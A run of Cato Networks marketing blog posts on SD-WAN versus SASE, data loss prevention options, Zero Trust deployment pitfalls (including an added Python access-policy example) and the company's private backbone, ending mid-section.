Be vigilant, have reporting and monitoring processes in place and be on guard for any changes in the attack surface.
Follow the link to get the full Q122 Cato Networks SASE Threat Research Report.
Is SD-WAN Really Dead?
Happy To Announce the Birth of a New Technology - SD-WAN
It wasn’t that long ago that we oohed and ahhed over the brand-new technology called SD-WAN. The new darling of the networking industry would free us from the shackles of legacy MPLS services. But just as we’re getting used to the toddling SD-WAN, along came yet another even more exciting newborn, the Secure Access Service Edge (SASE). It would give us even more – more security, better remote access, and faster deployment. SD-WAN? That’s so yesteryear – or is it? Is SD-WAN another networking technology to be cast off and forgotten in this SASE world, or does SD-WAN continue to play an important role? Let’s find out.
SD-WAN: The Toddler Years
When SD-WAN was born, there was much to love. It was cute, shiny, and taught enterprises how to walk -- walk away, that is, from MPLS – to a network designed for the new world. MPLS came of age when users worked in offices, resources resided in the datacenter, and the Internet was an afterthought. It was hopelessly out of step with a world that needed to move fast and one obsessed with the Internet.
SD-WAN addressed those problems, creating an intelligent overlay that allowed companies to tap commodity Internet connections to overcome the limitations of MPLS. More specifically this meant:
More capacity to improve application performance
Reduced network costs by using affordable Internet access, not high-priced MPLS capacity.
More bandwidth flexibility by aggregating Internet last mile connections
Improved last-mile availability by connecting sites through active/active connections
Faster deployments allowing sites to be connected in days not months
SD-WAN: The Teenager That Disappoints
But then the world changed – again. Resources moved into the cloud and the pandemic sent everyone home. Suddenly the office was no longer the focus of work. Solving the site-to-site communications challenge was no longer sufficient. Now companies needed a way to bring advanced security to wherever resources resided, in the cloud or the private data center, and wherever users worked, in the office, at home, or on the road, and do all of that without compromising performance. None of that was in SD-WAN's job description, making the following use cases particularly challenging:
SD-WAN lacks support for remote access -- period. There was no mobile client to join an SD-WAN. But today secure remote access is an essential pillar for guaranteeing business continuity.
SD-WAN is limited in its cloud readiness. As an appliance-based architecture, SD-WAN requires the management and integration of proprietary appliances to connect with the cloud. It also requires expensive premium cloud connectivity solutions, like AWS Direct Connect or Azure ExpressRoute, for optimized cloud connectivity.
SD-WAN might perform well enough within a region, but the global Internet is too unpredictable for the enterprise. It’s why all SD-WAN players encourage the use of third-party backbones for global connectivity. Such an approach, though, increases the complexity and costs of a deployment, and fails to deliver the benefits of optimized performance.
SD-WAN lacks the necessary security to protect branch offices. Next-generation firewall (NGFW), Intrusion Prevention Systems (IPS), Secure Web Gateway (SWG), anti-malware – all necessary components for protecting the enterprise and none of which are provided by SD-WAN. Factoring in the necessary appliances and services for delivering these capabilities significantly increases the cost and complexity of SD-WAN deployments.
SD-WAN: The Senior Years
So, SD-WAN isn’t perfect, but you might be wondering, why not let it coexist with the rest of the security and networking infrastructure? Just deploy a SWG or a Security Service Edge (SSE) solution. Doing so, though, leads to a network that’s at best managed with separate brains – one for your SD-WAN and another for your security infrastructure – and more likely additional “brains” for handling the rest of your security infrastructure and the global backbone.
And with multiple brains, everything becomes more complicated:
Forget zero-touch: SD-WAN made noise about claiming to offer zero-touch configuration, but the reality is far different. Without the necessary security capabilities, SD-WANs become far more complicated to deploy, requiring the additional security appliances to be assessed, purchased, delivered to the locations, installed, and integrated.
High Availability (HA) becomes a headache: With SD-WAN relying on Internet connections, HA is all but required. But with multiple brains, HA becomes far more challenging. There’s no automated provisioning of resilient connections between devices or services. There’s also no associated dynamic failover, requiring companies to install backup appliances and additional operational time testing failover scenarios.
Visibility is limited: Fragmenting data across multiple networking and security systems means you never have a complete view of your network. You can’t spot the network indicators of new threats. Outages become more difficult to troubleshoot with data hiding within multiple appliance logs.
Relying on SSE offerings or security services in the cloud won’t fully address the problem. Deployment is still a problem as there’s no automated traffic routing and tunnel creation between SD-WAN devices and cloud security PoPs. Security infrastructure is also unable to consume and share security policies (such as segmentation) between SD-WAN and cloud security vendors. Operationally, SD-WAN devices and cloud services remain distinct, making troubleshooting more challenging and depriving security teams of networking information that could be valuable in hunting for threats.
And in the end, reducing to two brains, while better than four, still leaves you with, well, two brains on one network.
SD-WAN: It’s Not Dead Just Part of a Bigger Family
So, is SD-WAN dead? Hardly. It remains what it always was – an important tool for building the enterprise network. But like the crazy uncle who might be great for laughs but not terribly reliable, SD-WAN has limitations that need to be addressed.
What’s needed is an approach that uses SD-WAN to connect locations but addresses its security and deployment limitations. SASE secures and connects the complete enterprise – headquarters, branches in distant locations, users at home or on the road, and resources in the cloud, private datacenters, or on the Internet. With one network securing and connecting the complete enterprise, deployments become easier, visibility improves, and security becomes more consistent.
To make that happen, SASE calls for moving the bulk of security and networking processing into a global network of PoPs. SD-WAN devices connect locations to the nearest PoPs; VPN clients or clientless access connect remote and mobile users. Native cloud connectivity within the PoPs connects IaaS and SaaS resources.
Cato is the World’s First and Most Robust Global SASE Platform
Cato is the world’s first SASE platform, converging SD-WAN and network security into a global, cloud-native service. Cato optimizes and secures application access for all users and locations, including branch offices, mobile users, and cloud datacenters, and allows enterprises to manage all of them with a single management console with comprehensive network visibility. Cato’s SASE platform has all the advantages of cloud-native architectures, including infinite scalability, elasticity, global reach and low total cost of ownership.
Connecting locations to the Cato SASE Cloud is as simple as plugging in a preconfigured Cato Socket appliance, which connects to the nearest of Cato’s 70+ globally dispersed points of presence (PoPs). Mobile users connect to the same PoPs from any device by running the Cato Client. With Cato, new locations or users can be up and running in hours or even minutes, not days or weeks. Security capabilities include Zero Trust Network Access (ZTNA), Secure Web Gateway (SWG), Cloud Access Security Broker (CASB), Data Loss Prevention (DLP), and Firewall as a Service (FWaaS).
With Cato, customers can easily migrate from MPLS to SD-WAN, optimize global connectivity to on-premises and cloud applications, enable secure branch office Internet access everywhere, and seamlessly integrate cloud datacenters and mobile users into a high-speed network with a zero-trust architecture. So whether it's mergers and acquisitions, global expansion, rapid deployments, or cloud migration, with Cato, the network and your business are ready for whatever is next in your digital transformation journey.
Are You Protecting Your Most Valuable Asset with a Data Loss Prevention (DLP)?
The Information Revolution and The Growing Importance of Data
We have all heard about the information revolution, but what does it actually mean and how profound is it? An interesting way to understand this is by looking at how it has impacted modern enterprises.
A company's assets can be divided into two types: tangible vs intangible. Simply put, tangible assets are those with a physical form factor (or which represent something physical). Intangible assets are those which do not really exist in the conventional sense, such as a company's intellectual property. Research by Ocean Tomo [1] covering the leading 500 companies in the US (S&P 500) shows that in 1975, intangible assets accounted for 13% of their total value. By 2015 it grew to 84% and by 2020 it reached 90%.
Figure 1: The value of intangible assets
Simply put, 90% of the value of a modern-era company comes from what it knows, only 10% from what it has. When looking at how these numbers shifted over the last 45 years, we can see how information has become the single most valuable asset for the modern enterprise.
Most enterprises, however, do not have the necessary means to effectively protect their data. Let's take a look at why this is, what protecting enterprise data means, and how to choose the right solution for your enterprise.
Protecting Your Company's Data With DLP
Information has critical value to an enterprise. It is, however, quite difficult to protect, especially considering a great part of it typically resides in the cloud. There are numerous tools aimed at restricting access to enterprise assets, but the most efficient solution to protect the movement of information to and from enterprise assets is Data Loss Prevention (DLP).
While DLP solutions have been around for 15 years, their adoption has been limited and mostly by high-end enterprises. The complexity, prohibitive costs and expertise required to obtain and effectively manage DLP solutions has left them beyond the reach of most enterprises.
The increasing value of information, the growing adoption of cloud computing, and continued rise in cybercrime, are driving enterprises to the realization that they need to do a better job protecting their data. The need for DLP is clear and imminent, and market interest is rising.
Gartner saw a 32% rise in DLP inquiries in 2020 vs the previous year [2]. But how can enterprises overcome the current adoption barriers and enable DLP protection for their assets? Let us start by looking at the types of DLP solutions and their respective advantages and shortcomings.
DLP isn't one thing
Gartner recognizes three types of DLP solutions [2]:
Enterprise DLP (EDLP)
Integrated DLP (IDLP)
Cloud Service Provider Native DLP (CSP-Native DLP)
The above solutions all have their pros and cons, and the acquiring decision-makers need to decide which solution attributes are more important for their use-cases, and which can be compromised. Let us take a deeper look into each one.
Enterprise DLP (EDLP) - An enterprise level solution which covers all relevant traffic flows, and which is implemented as a stand-alone solution. EDLPs require adding (yet) another solution to an organization’s security toolbox. This typically requires an expansive project plan and additional expertise, adding complexity and cost to the project. While an EDLP offers a single console and policy management interface for the entire network, it is typically a separate console from the other network security tools (FW, IPS, AM, SWG, etc.). EDLPs will typically add another hop in the security service chain, and thus add latency and impact performance.
Figure 2: Enterprise DLP
Integrated DLP (IDLP) - DLP functionality that is added on top of a pre-existing security product such as a Secure Web Gateway (SWG). IDLPs simplify the deployment process and are regarded as a quick win to get DLP up and running quickly and at a reduced cost. IDLPs, however, are limited to the traffic and use cases the base product is intended for. Piggybacking on a SWG, for example, will cover only Internet-bound traffic and may not inspect IaaS traffic. Gaining wider coverage will require adding DLP to additional security products, which will lead to fragmented consoles and policy management.
Figure 3: Integrated DLP
CSP-Native DLP - A cloud-based DLP which is deployed in, or provided by, a cloud service provider (CSP). This type of solution is also simple to adopt as it is delivered as a Software as a Service (SaaS) and doesn't require deployment. It is, however, limited to the traffic sent to or from the specific CSP providing it. As most enterprises using cloud platforms are adopting a multi-cloud strategy, getting complete coverage will require using DLP services from several CSPs. Also, this type of solution will typically not cover all SaaS applications and is typically limited to sanctioned applications only.
Figure 4: CSP-Native DLP
Choosing The Right DLP For Your Enterprise
EDLPs typically offer better coverage and enhanced protection, however, the complexity and cost concerns drive security leaders to shy away and look for simpler and cheaper options. An IDLP offers this, but the limited coverage and disjointed consoles and policy management impact their effectiveness and level of protection. CSP-Native DLPs are also simpler to onboard but are cumbersome for multi-cloud deployments and do not cover the critical use-case of unsanctioned applications (AKA Shadow IT).
All the above DLP types come with compromises. Ideally, we would want a solution that is easy to deploy and manage, has complete coverage and optimal protection, does not impact performance, and covers unsanctioned applications.
The rise of SASE DLP
A true Secure Access Service Edge (SASE), or its Secure Service Edge (SSE) subset, offers the best of all worlds. Cato's SASE Cloud, for example, covers all fundamental SASE requirements:
All edges - Cato SASE Cloud covers all enterprise users, on-prem or remote, and all applications and services, on-prem, IaaS and SaaS. This means that Cato's SASE-based DLP will have complete coverage of all traffic and all use-cases.
Single pass processing - Cato SASE Cloud utilizes Cato's proprietary Single-Pass Cloud Engine (SPACE), which is based on a modular software platform stack that executes the networking and network security services in parallel. This enables a shared context, enhancing overall protection, and minimizes latency. Adding DLP to a Cato deployment is done by a flip of a switch and requires no additional deployment.
Cloud-native - Cato DLP is delivered fully from the cloud and offers all the benefits of a cloud-native solution, including unlimited scalability and inherent high-availability. Since it is part of the Cato SASE Cloud, it is completely CSP-agnostic and supports all leading cloud service providers, making it a true multi-cloud solution.
Converged - Cato SASE runs and manages all services as a single solution, enabling configuration, management, and visibility from a single-pane-of-glass management console.
Figure 5: SASE/SSE DLP
The pros and cons of the different DLP solution types:
Figure 6: DLP types, pros and cons
The DLP that's in your reach
A true SASE solution enables enterprises to adopt a DLP solution that benefits from all the advantages mentioned above, and more. The reduced complexity and costs lower the traditional barrier of adoption, enabling enterprises of all sizes and levels of expertise to better protect their data. It also eliminates the dilemma of what to compromise on when looking to adopt DLP within your environment. A SASE DLP requires no compromises. Protecting your enterprise's most valuable asset is just a flip of a switch away.
To learn more about Cato DLP, read our DLP whitepaper.
[1] Harvard Business Review
[2] DLP market guide 2021 - Gartner
A CISO’s Guide: Avoiding the Common Pitfalls of Zero Trust Deployments
The Role of the CISO Post-Pandemic
The world has evolved... Prior to recent global events, many organizations viewed digital transformation as a slow-moving journey that would be achieved gradually over time. However, Covid turned this completely on its ear, forcing most organizations to accelerate that journey from 2-3 years down to 2-3 months, and doing so without a well-thought-out strategy. Couple this with the rapid rise of Work-From-Anywhere (WFA) and CISOs have realized their traditional security architectures, specifically VPNs, are no longer adequate to ensure only authorized users have access to critical resources.
Collectively, this has made the role of CISO ever more important because, as a result of this accelerated journey, we now have applications everywhere, people everywhere, leading to increased cyber threats everywhere. The role of CISO has one core imperative: mapping out the company’s security priorities and strategy, then executing this flawlessly to ensure the strongest possible security posture to protect access to critical data.
Zero Trust Is Just a Starting Point
This is why Zero Trust has now become top-of-mind for all CISOs. The concept of Zero Trust has been around for more than a decade since first being introduced. Zero Trust mandates that all edges, internal or external, cloud, branch or data center, be authenticated, authorized and validated before granting or maintaining access to critical data. In short, Zero Trust is a framework for building holistic security for the modern digital infrastructure and associated data. Considering cyber threats continue to rapidly expand, and chasing down data breaches has become a daily activity, Zero Trust is uniquely equipped to address the modern digital business architecture: WFA workers, supply chains, hybrid cloud, and evolving threats.
It must be noted that Zero Trust is not a single product solution, and CISOs would be well advised to consult the three main standards (Forrester ZTX, Gartner CARTA, NIST SP-800-207) as guidance for developing their Zero Trust strategy. Of the three, to date, NIST SP-800-207, as pictured below, is the most widely adopted framework.
In general, the NIST model is a discussion of 2 key functions:
Data plane – this is the collector of data from numerous sources. These sources can be application data, user device information, user identity information, etc.
Control plane – this is the brains of the model as this is responsible for making decisions upon what is considered good, bad, or requiring further clarification.
Together, the control plane and data plane collaborate to determine whether a user should be granted access permissions at any point in time to the resource they are requesting. Critical for this to be viable, effective, and scalable is the context that informs decisions to be made around access and security. As each business varies in its data flows and security concerns, this context consists of data feeds, as depicted in figure 1, that include compliance data, log data, threat intelligence feeds and user and application data, as well as other data sources captured across the network. The more context you have, the better decisions your Zero Trust deployment will make.
The 5 Most Common Pitfalls in Zero Trust Projects
The concept of Zero Trust is often misunderstood, potentially resulting in misaligned strategies that don’t meet the organization’s needs. Gartner defines Zero Trust as a ‘mindset that defines key security objectives’ while removing implicit trust in IT architectures. This implies that today’s CISOs would be well-advised to pursue their Zero Trust strategy thoughtfully, to ensure they avoid common pitfalls that impede most security initiatives.
Pitfall 1: Failing to Apply the Key Tenets of Zero Trust
Zero Trust came to life as a resolution for overly permissive access rights that created broad security risks throughout networks. The concept of implicit deny is perceived as the catch-all terminology for a better security architecture, assuming it to be the fix-all for all things security. Considering this, it may be easy for CISOs to inadvertently disregard the core purpose of Zero Trust and overlook some key architectural tenets that influence Zero Trust architectures.
While each of the Zero Trust frameworks calls out a number of architectural attributes of Zero Trust, for the purpose of this section, we will highlight a few that we feel should not be overlooked.
Dynamic policy determines access to resources – dynamic policies focus on the behavioral characteristics of both the user and devices when determining whether access will be granted or denied. A subset of these characteristics can include location, device posture, data analytics and usage patterns. For example, is the user in a restricted location, or are user and device credentials being used correctly? Any of these should determine whether access should be granted and at what level.
Continuous monitoring and evaluation – no user or device should blindly be trusted for access to network or application resources. Zero Trust dictates that the state of both the resource and the entity requesting access be continually monitored and evaluated. Those deemed to be risky should be treated accordingly, whether it is limited access or no access.
Segmentation & Least Privileges – Zero Trust should eliminate blind trust and by extension, blanket access to targeted resources from all employees, contractors, supply chain partners, etc. and from all locations. And when access is granted, only the minimal amount of access required to ensure productivity should be granted. This ensures the damage is limited should there be a breach of some kind.
Context Automation – For Zero Trust to deliver the desired impact, organizations need to collect a lot of data and contextualize it. This context is the key, as without context, well-informed decisions for user or device access cannot be made. The more context, the better the decisions being made.
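The four tenets above, shown as an added example that is not part of the original article or any vendor's product: a small policy decision function that denies by default, grants access per role and application, lowers or removes access based on device and location signals, and is re-run on every request so a posture change takes effect mid-session. The roles, applications, signal fields and the placeholder country code `XX` are all constructed for illustration.

```python
from dataclasses import dataclass, replace
from typing import List, Tuple

LEVELS = ("deny", "read-only", "read-write")  # ordered weakest to strongest

# Constructed policy: role -> application -> highest level the role may receive.
# A missing entry means no access (default deny, least privilege).
POLICY = {
    "finance-analyst": {"erp": "read-write", "wiki": "read-write"},
    "contractor": {"wiki": "read-only"},
}
RESTRICTED_COUNTRIES = {"XX"}  # placeholder country code, not a real one


@dataclass(frozen=True)
class Context:
    """Signals gathered for a single request."""
    user: str
    role: str
    app: str
    country: str
    mfa_passed: bool
    device_managed: bool
    disk_encrypted: bool
    edr_running: bool


def cap(level: str, ceiling: str) -> str:
    """Return the weaker of two access levels."""
    return LEVELS[min(LEVELS.index(level), LEVELS.index(ceiling))]


def decide(ctx: Context) -> Tuple[str, List[str]]:
    """Evaluate one request and return (access level, reasons)."""
    grant = POLICY.get(ctx.role, {}).get(ctx.app)
    if grant is None:
        return "deny", [f"no grant for role={ctx.role} app={ctx.app}"]
    # Hard failures: any one of these denies regardless of the grant.
    if not ctx.mfa_passed:
        return "deny", ["identity not verified with MFA"]
    if ctx.country in RESTRICTED_COUNTRIES:
        return "deny", [f"request from restricted location {ctx.country}"]
    if not ctx.edr_running:
        return "deny", ["endpoint protection not running"]
    # Soft signals: access is still granted but reduced to limit exposure.
    level, reasons = grant, []
    if not ctx.device_managed:
        level = cap(level, "read-only")
        reasons.append("unmanaged device: capped at read-only")
    if not ctx.disk_encrypted:
        level = cap(level, "read-only")
        reasons.append("disk not encrypted: capped at read-only")
    return level, reasons or ["all checks passed"]


class Session:
    """Re-runs the policy on every request instead of trusting the login result."""

    def __init__(self, ctx: Context):
        self.ctx = ctx
        self.audit = []  # (user, app, wanted, allowed, reasons)

    def update_signals(self, **changes) -> None:
        """Apply fresh telemetry, e.g. a posture agent reporting a change."""
        self.ctx = replace(self.ctx, **changes)

    def request(self, app: str, wanted: str) -> bool:
        if wanted not in LEVELS[1:]:
            raise ValueError(f"unknown access level: {wanted}")
        level, reasons = decide(replace(self.ctx, app=app))
        allowed = LEVELS.index(wanted) <= LEVELS.index(level)
        self.audit.append((self.ctx.user, app, wanted, allowed, reasons))
        return allowed


def demo() -> List[bool]:
    """Constructed scenario: one employee and one contractor."""
    alice = Session(Context("alice", "finance-analyst", "erp", "DE",
                            True, True, True, True))
    bob = Session(Context("bob", "contractor", "wiki", "DE",
                          True, False, True, True))
    results = [alice.request("erp", "read-write")]     # healthy managed device
    alice.update_signals(edr_running=False)             # posture degrades mid-session
    results.append(alice.request("erp", "read-only"))   # now denied
    results.append(bob.request("wiki", "read-only"))    # within the contractor grant
    results.append(bob.request("wiki", "read-write"))   # above the grant
    results.append(bob.request("erp", "read-only"))     # no grant at all
    return results


if __name__ == "__main__":
    print(demo())
```

The `audit` list on each session records the reasons behind every decision, which is the raw material for the context feeds the section describes.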
Cato SASE Cloud Approach: The Cato SASE Cloud takes a risk-based approach to Zero Trust, combining Client Connectivity & Device Posture capabilities with more holistic threat prevention techniques. Because we have full visibility of all data flows across the network, we utilize this, as well as threat intelligence feeds and user and device behavioral attributes, to pre-assess all users and devices prior to granting access onto the network. This in-depth level of context allows us to determine their client connectivity criteria and device suitability for network access, as well as continually monitor and assess both the user and device throughout their life on the network. Additionally, we use AI & Machine Learning algorithms to continually mine the network for indications of malware or other advanced threats and will proactively block these threats to minimize the potential damage inflicted upon the network.
Pitfall 2: Treating Zero Trust Like a Traditional VPN
When deploying Zero Trust, many organizations tend to rely on legacy security processes that are no longer applicable or select the shiny new toy that equates to a less viable solution. In 2021, Gartner noted that some organizations reported initially configuring their Zero Trust deployments to grant full access to all applications, which ironically, mirrored their VPN configuration. One of the intrinsic shortcomings of traditional VPNs, beyond the connectivity issue, is the challenge of least privilege user access to critical applications once a user has been authenticated to the network. Traditional VPNs cannot provide partial or specific access to selected applications or resources. So, deploying Zero Trust like their old VPN leaves us to wonder what problems they are truly solving, if any.
CISOs must remember that existing security architectures are based on the concept of implicit trust, which leads to unknown, yet ever-increasing risk to modern enterprise environments. The ultimate goal of Zero Trust is to ensure that users and their devices prove they can be trusted with access to critical resources. Hence, the ultimate goal for any CISO in creating a Zero Trust strategy is to reduce the risk posed by users and devices, and in the event of a successful breach, limit the spread and impact of the attack.
Cato SASE Cloud Approach: Cato Networks realizes that existing VPN architectures are inadequate to provide the depth of access protections for critical enterprise resources. The Cato approach to Zero Trust invokes consistent policy enforcement everywhere to ensure least privilege access to all enterprise & cloud resources, while also taking a holistic approach to preventing cyber threats. We consume terabytes of data across our entire SASE Cloud backbone, and this informs how we apply additional protections once users and devices are on the network.
Pitfall 3: Not understanding the true impact on the user, IT and Security
Unfortunately for many CISOs, IT and Security departments do not always operate with aligned priorities and desired outcomes. IT departments may have critical projects they deem to have a higher priority than Security. Security teams, being tasked with strengthening the organization’s security posture, may view Zero Trust as the only priority. In such cases of mis-aligned priorities, Zero Trust efforts may result in incomplete or mis-configured deployments, expanding security gaps and increasing blind spots. And let’s not forget the end user. When IT organizations finally make significant changes to networks, security, or other systems, if priorities aren’t aligned, the end results will produce adverse user outcomes.
When it comes to Zero Trust, CISOs must ensure they are mapping out the journey. In doing so, IT and Security teams should establish a “Hippocratic Oath” of “first, do no harm”, similar to that of the medical community. This could make it easier to map the journey to Zero Trust where the solution is simple to deploy, easy to manage, easily scales at the speed of the business, and provides positive outcomes for all parties impacted. Critical to this is the user – Zero Trust must not impede their ability to get things done.
Cato SASE Cloud Approach: At Cato Networks, our entire approach to Zero Trust is to ensure the most holistic user experience with zero impact on productivity. Often when deploying or upgrading to new security technologies, security teams will inadvertently have policy mis-matches that result in inconsistent policy enforcement in certain segments of the network. Zero Trust, if not implemented correctly, increases the risk level for negative user experiences, which will reflect poorly upon the CISO and their teams. With the Cato SASE Cloud, Zero Trust & Client Access policies are applied once and enforced everywhere. This ensures specific and consistent policy treatment for all users and devices based upon identity and user and device access criteria.
"The hallmark of Zero Trust is Simplicity"
Pitfall 4: Inadequately Scoping Common Use Cases
CISOs are so inundated with everyday security concerns that identifying all possible use cases for their Zero Trust initiative, while seemingly straightforward, could be easily overlooked. It is easy to drill down into the core requirements of Zero Trust, approaching from a broad enterprise perspective, yet neglect smaller details that might derail their project. While there are numerous use cases and each would depend on the individual organization, this document calls out three use cases that, if not properly planned for, will impact all non-HQ based or non-company users.
Multi-branch facilities – It is common for today’s enterprises to consist of a single headquarters with multiple global locations. More commonly, these global locations exist in a shared space arrangement whereby the physical network and connectivity is independent of the company. In such cases, these employees still require access to enterprise applications or other resources at the HQ or company data center. In other cases, a user may be a road warrior, using unmanaged personal devices, or be located in restricted locations. Given this, great care and consideration must be given in determining if, when and how to grant access to necessary resources while denying access or restricting actions to more sensitive resources.
Multi-cloud environments – More enterprises are utilizing multi-cloud providers to host their applications and data. There are occasions whereby the application and data source exist in different clouds. Ideally, these cloud environments should connect directly to each other to ensure the best performance.
Contractors and 3rd party partners – Contractors and 3rd party supply chain partners requiring access to your network and enterprise resources is very common these days. Often these entities will use unmanaged devices and/or connect from untrusted locations. Access can be granted on a limited basis, allowing these users and devices only to non-critical services.
CISOs must factor in these and other company specific use cases to ensure their Zero Trust project does not inadvertently alienate important non-company individuals.
Cato SASE Cloud Approach: At Cato Networks, we acknowledge that use cases are customer, industry, and sometimes, location dependent. And when Zero Trust is introduced, the risk of inadvertently neglecting one or more critical use cases is magnified. For this reason, we built our architecture to accommodate, not only the most common use cases, but also obscure and evolving use cases as well. The combination of our converged architecture, global private backbone, single policy management, and virtual cloud sockets ensure we provide customers with the most accommodating, yet most robust and complete Zero Trust platform possible.
Pitfall 5: Not having realistic ROI expectations
ROI for many IT-related initiatives is rather difficult to measure, and many CISOs often find themselves unsure how to demonstrate this to ensure company-wide acceptance. Three questions around ROI that are traditionally difficult to answer are:
What should we expect?
When should we expect it?
How would we know?
Like many things technology-related, CISOs are hesitant to link security investments to financial metrics. However, delaying a Zero Trust deployment can yield increased costs, or negative ROI over time that can be measured in increased data breaches, persistent security blind spots, inappropriate access to critical resources, and misuse of user and resource privileges, just to name a few.
CISOs can address these ROI concerns through a number of strategies that extend beyond simple acquisition costs and into the broader operational costs. With the right strategy and solution approach, a CISO can uncover the broader strategic benefits of Zero Trust on financial performance to realize it as an ROI-enabler.
Cato SASE Cloud Approach: It is easy to appreciate the challenge of achieving ROI from Security projects. As mentioned, CISOs, like CIOs, are hesitant to link security investments to financial metrics. However, with an appropriate Zero Trust strategy, organizations will assure themselves enormous savings in IT effort and vendor support. Organizations deploying a Zero Trust solution based on a converged, cloud-native, global backboned SASE Cloud like Cato can expect more efficient cost structures while achieving greater performance. By converging critical security functions, including Zero Trust, into a single software stack within the Cato SASE Cloud, organizations are able to immediately retire expensive, non-scalable, maintenance-intensive VPN equipment. This approach delivers ease of deployment and simple management, while drastically reducing maintenance overhead and IT support costs.
Achieving Your Organization’s Zero Trust Goals with Cato SASE Cloud
Justifying a security transformation from implicit trust to Zero Trust is becoming easier and easier. However, determining the right approach to achieving an organization’s Zero Trust goals can be daunting. It is challenging when factoring in the broad paradigm shift in how we view user and device access, as well as numerous use case considerations with unique characteristics. Zero Trust Network Access is an identity-driven default-deny approach to security that greatly improves your security posture. Even if a malicious user compromises a network asset, ZTNA can limit the potential damage. Furthermore, the Cato SASE Cloud’s security services can establish an immediate baseline of normal network behavior, which enables a more proactive approach to network security in general and threat detection in particular. With a solid baseline, malicious behavior is easier to detect, contain, and prevent.
“The Zero Trust is a security model based on the principle of maintaining strict access controls and not trusting anyone by default; a holistic approach to network security, that incorporates a number of different principles and technologies.”
The Cato SASE Cloud was designed for the modern digital enterprise. Our cloud-native architecture converges security features such as Zero Trust Network Access (ZTNA), SWG, NGFW, IPS, CASB, and DLP, as well as networking services such as SD-WAN and WAN Optimization across a global private backbone with a 99.999% uptime SLA. As a result, Cato is the only vendor currently capable of delivering seamless ZTNA on a true SASE platform for optimized performance, security, and scalability.
Zero Trust is a small part of SASE. The Cato SASE Cloud restricts access of all edges – site, mobile users and devices, and cloud resources – in accordance with Zero Trust principles. Click here to understand more about Cato Networks’ approach to Zero Trust.
Not All Backbones are Created Equal
It’s no secret that many enterprises are reevaluating their WAN. In some cases, it might be an MPLS network, which is no longer suitable (or affordable) for the modern digital business. In other cases, it might be a global SD-WAN deployment, which relied too much on the unpredictable Internet.
Regardless of why the company needs to transform its enterprise network, the challenge remains the same: How do you get secure connections with the same service level of predictability and consistency as MPLS at an Internet-like price point? This calls for a SASE service built on a global private backbone.
Why a Global SASE Service?
Even enterprises who previously thought of themselves as regional operations find they need global reach today. Why? Because users and data are everywhere. They can (and probably do) sit in homes (or cafés) far from any place an office might be situated, accessing cloud apps across the globe. Pulling traffic back to some site for security inspection and enforcement adds latency, killing the application experience. Far better is to put security inspection wherever users and data sit. This way they receive the best possible experience no matter where that executive might be sitting in the world.
Once inspected, moving traffic to a private datacenter or other sites across the global Internet is asking for trouble. The Internet might be fine as an access layer, but it’s just too unpredictable as a backbone. One moment a path might be direct and simple; the next your traffic could be sent for a 40-stop visit the wrong way around the globe. With a private backbone, optimized routing and engineering for zero packet loss makes latency far lower and more predictable than across the global Internet.
Why Not Private Networks from Hyperscalers?
All major public cloud providers – AWS, Azure, and GCP – realize the benefits of global private networks and offer backbone services today. So why not rely on them? Because while a hyperscaler backbone might be able to connect SD-WAN devices, it lacks the coverage to bring security inspection close to the users across the globe. Only a fraction of the many hyperscaler PoPs can run the necessary security inspections and only a smaller fraction can act as SD-WAN on-ramps. At last check, for example, only 39 of Azure's 65 PoPs supported Azure Virtual WAN. And then there's the question of availability. The uptime SLAs offered by cloud providers are too limited, only running 99.95% uptime, while traditional telco service availability typically runs at four nines, 99.99% uptime.
Why Cato’s Global Private Backbone?
For those reasons and more, enterprises are replacing their legacy network with Cato’s global private backbone. Today, it’s the largest private SASE network spanning 70+ PoPs worldwide.
Built as a cloud-native network with a global private backbone, Cato SASE Cloud has revolutionized global connectivity. Using software, commodity hardware, and excess capacity within global carrier backbones, we provide affordable SLA-backed connectivity at global scale.
And every one of our PoPs runs the Cato Single Pass Cloud Engine (SPACE), the converged software stack that optimizes and secures all traffic according to customer policy.
Our simple edge devices combine last-mile transports, such as fiber, cable, xDSL, and 4G/5G/LTE. Encrypted tunnels across these last-mile transports carry traffic to the nearest PoP. The same goes for our mobile clients (and clientless access). From the PoP, traffic is routed globally to the PoP closest to the destination using tier-1 and SLA-backed global carriers.
This model extends to cloud services as well. Traffic to cloud applications or cloud data centers exits at the PoP closest to these services, and in many cases within the same data center hosting both PoP and cloud service instance.
Key Benefit #1 – Optimized Performance
With built-in WAN optimization, Cato increases data throughput by as much as 40x. Advanced TCP congestion control enables Cato edges to send and receive more data, as well as better utilize available bandwidth. Other specific optimization improvements include:
Real-time network condition tracking to optimize packet routing between PoPs. We don’t rely on inaccurate metrics like BGP hops, but rather on network latency, packet loss, and jitter in the specific route.
Controlling the routing and achieving MPLS-like consistency and predictability anywhere in the world. For example, the path from Singapore to New York may work better through Frankfurt than going direct, and Cato SASE Cloud adapts to the best route in real time.
Applying dynamic path selection both at the edge and at the core – creating end-to-end optimization.
Accelerating bandwidth intensive operations like file upload and download through TCP window manipulation.
Key Benefit #2 – Self-Healing and Resiliency
To ensure maximum availability, Cato SASE Cloud delivers a fully self-healing architecture. Each PoP has multiple compute nodes each with multiple processing cores. Each core runs a copy of Cato SPACE, which manages all aspects of failure detection. Failover and fail back are automated, eliminating the need for dedicated planning or pre-orchestration. More specifically, resiliency capabilities include:
Automatically working around backbone providers in case of outage or degradation to ensure service availability.
Ensuring that if a compute node fails, tunnels seamlessly move to another compute node in the same PoP or to another nearby PoP. And in the unlikely event that a tier-1 provider fails or degrades, PoPs automatically switch to one of the alternate tier-1 providers.
Specialized support for challenging locations like China. Cato PoPs are connected by private and encrypted links through a government-approved provider to Cato's Hong Kong PoP.
A great example of Cato resiliency at work was the recent Interxion datacenter outage in London housing Cato’s London PoP. The outage disrupted trading on the London Metal Exchange for nearly five hours. And for Cato? A few seconds. Read this first-hand account from Cato’s vice president of operations, Aviram Katzenstein.
Key Benefit #3 – Secure and Protected
Cato’s global private backbone has all security services deployed in each of the Cato PoPs. This means that wherever you connect from, your traffic is protected by a full security stack at the PoP nearest to you. From there, Cato’s backbone carries your traffic directly to its destination, wherever it may be. This enables full security for all endpoints without any backhauling or additional stops along the way.
Extensive measures are taken to ensure the security of Cato SASE Cloud. All communications – between PoPs, with Cato Sockets, or Cato Clients – are secured by AES-256 encrypted tunnels. To minimize the attack surface, only authorized sites and remote users can connect and send traffic to the backbone. The external IP addresses of the PoPs are protected with specific anti-DDoS measures. Our service is ISO 27001 certified.
Key Benefit #4 – Internet-like Costs
